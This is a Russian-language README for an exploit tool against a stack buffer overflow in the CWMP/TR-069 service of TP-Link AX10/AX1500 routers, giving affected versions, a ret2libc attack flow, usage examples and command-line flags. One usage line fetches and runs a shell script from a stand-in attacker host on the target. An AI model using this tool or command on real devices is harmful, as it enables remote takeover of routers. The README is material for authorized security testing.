
Эксплойт для переполнения буфера стека TP-Link AX10/AX1500 в CWMP (TR-069), позволяющий удаленное выполнение кода через ret2libc с обходом ASLR. Включает режимы только проверки, DoS и выполнения команд.
TP-Link AX10/AX1500 CWMP Переполнение буфера RCE
Переполнение стека буфера в CWMP (TR-069), приводящее к удаленному выполнению кода.
| Поле | Значение |
|---|---|
| Продукт | TP-Link AX10, AX1500 |
| Затронутые версии | AX10 < 1.2.1, AX1500 < 1.3.11 |
| CVSS | 8.6 (Высокий) |
| Тип | Переполнение стека буфера |
| Вектор | CWMP/TR-069 (порт 7547) |
| Воздействие | Удаленное выполнение кода |
flowchart LR
A[Attacker] --> B["Malicious ACS"]
B --> C["SetParameterValues"]
C --> D["Stack Overflow"]
D --> E["Overwrite PC"]
E --> F["ret2libc"]
F --> G["system()"]
G --> H["RCE"]Уязвимость находится в процессе cwmp при обработке SOAP-запросов SetParameterValues. Входные данные используются для вычисления размера буфера без проверки границ.
Эксплуатация:
python exploit.py <target_ip> --check-only
python exploit.py 192.168.0.1 --dos
python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"
Нет (использует стандартную библиотеку)
Только для авторизованного тестирования безопасности.
| Флаг | Описание | По умолчанию |
|---|
-p, --port | Порт CWMP | 7547 |
-c, --command | Команда для RCE | нет |
-t, --timeout | Таймаут сокета | 10 |
--dos | Только режим DoS | выкл |
--check-only | Проверить уязвимость | выкл |